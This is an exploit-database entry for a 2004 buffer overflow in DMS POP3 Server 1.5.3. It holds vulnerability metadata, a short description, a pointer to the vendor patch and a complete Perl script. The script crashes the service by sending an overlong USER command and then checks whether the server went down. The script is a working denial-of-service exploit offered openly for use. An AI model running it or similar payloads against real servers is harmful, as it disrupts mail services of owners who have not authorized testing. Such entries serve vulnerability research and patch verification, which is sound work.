DMS POP3 Server Overflow

vendor:

DMS POP3 Server

by:

milw0rm.com

7.5

CVSS

HIGH

Buffer Overflow

121

CWE

Product Name: DMS POP3 Server

Affected Version From: Windows 2000/XP 1.5.3 build 37

Affected Version To: Unknown

Patch Exists: YES

Related CWE:

CPE: a:dms:dms_pop3_server:1.5.3

Metasploit:

Other Scripts:

Platforms Tested:

2004

This script exploits a buffer overflow vulnerability in the DMS POP3 Server for Windows 2000/XP version 1.5.3 build 37. By sending a long string of 'A' characters as the username, it crashes the server and potentially allows for remote code execution. The exploit attempts to kill the DMS POP3 service by sending the malicious username and then checks if the service is still running. This vulnerability was discovered in 2004.

Mitigation:

Apply the patch provided by the vendor to fix the buffer overflow vulnerability. The patch can be downloaded from the vendor's website at http://www.digitalmapping.sk.ca/pop3srv/Update.asp.

Source

Exploit-DB raw data:

#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl <ip> <port>
#        DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
#####################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
				    PeerPort => $ARGV[1],
				    Proto    => "TCP"))
{
	print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";

	sleep(1);

	print $socket "USER " . "A" x 1023;

	close $socket;

	sleep(1);

	if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
					    PeerPort => $ARGV[1],
					    Proto    => "TCP"))
	{
		close $socket;

		print "failed!\n";
	}
	else
	{
		print "successful!\n";
	}
}
else
{
	print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}

# milw0rm.com [2004-11-21]